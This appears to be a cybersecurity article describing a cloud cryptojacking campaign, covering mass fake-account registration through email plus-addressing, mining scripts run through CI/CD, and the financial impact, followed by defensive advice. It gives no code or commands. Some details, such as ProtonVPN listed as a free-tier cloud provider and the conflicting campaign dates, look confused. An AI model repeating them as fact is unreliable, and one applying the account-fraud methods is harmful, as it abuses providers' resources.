Cryptojacking in the Cloud: How Hackers Exploit Free Computing Resources for Illicit Gains

Introduction

The rise of cloud computing has revolutionized the way businesses operate, offering scalable and cost-effective solutions for enterprises worldwide. However, with these advantages comes a growing cybersecurity threat: cryptojacking. This practice involves hackers illicitly using cloud-based resources to mine cryptocurrency, often at the expense of unsuspecting businesses and individuals.

In late 2024, cybersecurity experts at Netlify uncovered an extensive cryptojacking campaign that exploited cloud infrastructure, including services from Microsoft, ProtonVPN, and other providers. This large-scale attack, which began as early as 2021, highlights the evolving tactics of cybercriminals in the digital age.

The Anatomy of a Cloud Cryptojacking Campaign

The Netlify research team found that hackers had been abusing cloud environments by creating thousands of fake accounts. These accounts were linked to hundreds of domains and IP addresses, allowing the attackers to leverage free-tier cloud services for cryptocurrency mining.

Key Findings from the Investigation

• Duration and Scope: The attack spanned from September to November 2024, with evidence suggesting that some related activities date back to July 2021.
• Targeted Cloud Services: Attackers exploited free-tier cloud resources from major providers, including Microsoft, ProtonVPN, Alibaba Cloud, and DigitalOcean.
• Cryptocurrencies Mined: Initially focused on TideCoin, the hackers later switched to VerusCoin and also mined SugarChain.
• Financial Impact: Approximately $6,500 in cryptocurrency was mined. However, given the scale of the attack, cloud providers faced an estimated $20,000 to $30,000 per month in wasted computing resources.

How Hackers Conducted the Attack

1. Creating and Managing Fake Accounts

One of the most effective techniques used in this campaign was mass registration of accounts. Cybercriminals utilized email address manipulation techniques such as:

• Plus Addressing: A method where an email address is modified with a "+" sign to create multiple unique addresses (e.g., user+randomstring@example.com).
• Subdomain Addressing: Attackers used custom domains to generate thousands of unique but related email addresses.

More than 3,200 fake email addresses were detected, with most originating from six private domains registered between 2023 and 2024.

2. Deploying Malicious Cryptomining Scripts

Hackers hosted their cryptomining scripts on repositories such as Bitbucket and GitLab. These scripts were then executed through cloud computing environments, using CI/CD tools to bypass detection.

Netlify's investigation revealed eight different script execution strategies, showing that attackers adapted their methods to avoid detection. The scripts typically:

• Downloaded cryptominer binaries onto cloud infrastructure.
• Executed mining commands to contribute computing power to predefined wallets.
• Used obfuscation techniques to evade monitoring.

3. Utilizing Compromised Cloud Services

The attackers took advantage of free-tier plans provided by cloud service providers. Since these free plans offer limited computing power without verification requirements, hackers could generate significant hashing power without incurring direct costs.

During the campaign, Microsoft Cloud alone saw over 2,400 fraudulent account registrations, followed by significant activity from Telkom Indonesia, ProtonVPN, and Datacamp.

The Financial and Security Implications

While $6,500 in direct cryptocurrency earnings may seem insignificant, the true cost of such attacks lies in the cloud infrastructure expenses borne by providers and businesses. The excessive consumption of computing power disrupts legitimate cloud operations, leading to:

• Higher operational costs for cloud service providers.
• Slower performance for affected businesses.
• Increased security risks, as cryptojacking scripts can be leveraged for more severe cyber threats.

A single cryptojacking campaign can force cloud companies to spend tens of thousands of dollars per month to mitigate the impact, making it a costly problem for the industry.

How Companies Can Defend Against Cryptojacking

1. Monitor Cloud Activity and Resource Usage

Organizations should implement real-time monitoring tools to detect unusual spikes in CPU and GPU usage. Since cryptojacking often results in excessive resource consumption, any unexplained surge should be investigated.

2. Strengthen Account Verification and Security Policies

Cloud service providers must enhance their identity verification processes to prevent mass registration of fraudulent accounts. Recommended measures include:

• Implementing multi-factor authentication (MFA).
• Restricting free-tier accounts based on usage behavior.
• Monitoring IP addresses associated with suspicious activities.

3. Implement Threat Intelligence and Detection Mechanisms

Security teams should deploy behavior-based anomaly detection to flag activities associated with cryptomining. Advanced endpoint security solutions can:

• Identify known cryptomining binaries.
• Block unauthorized script execution.
• Detect and shut down unauthorized outbound traffic to mining pools.

4. Enforce Network Restrictions and Traffic Analysis

Cryptojackers often connect to known mining pools. Companies can mitigate this by:

• Blocking access to mining pool IP addresses and associated domains.
• Using intrusion detection systems (IDS) to analyze outbound network traffic.

5. Educate Employees and IT Teams

Awareness is key to preventing cryptojacking. IT teams should be trained to recognize:

• The signs of cryptojacking, such as unexpected system slowdowns.
• How to identify unauthorized scripts running in cloud environments.
• Best practices for securing cloud resources against abuse.

Conclusion

The cryptojacking campaign uncovered by Netlify is a stark reminder of how cybercriminals exploit cloud computing vulnerabilities for financial gain. As cloud adoption continues to grow, businesses must stay vigilant, implement proactive security measures, and invest in advanced threat detection strategies.

By taking a multi-layered approach to cloud security, organizations can mitigate the risks of cryptojacking and safeguard their computing resources from exploitation.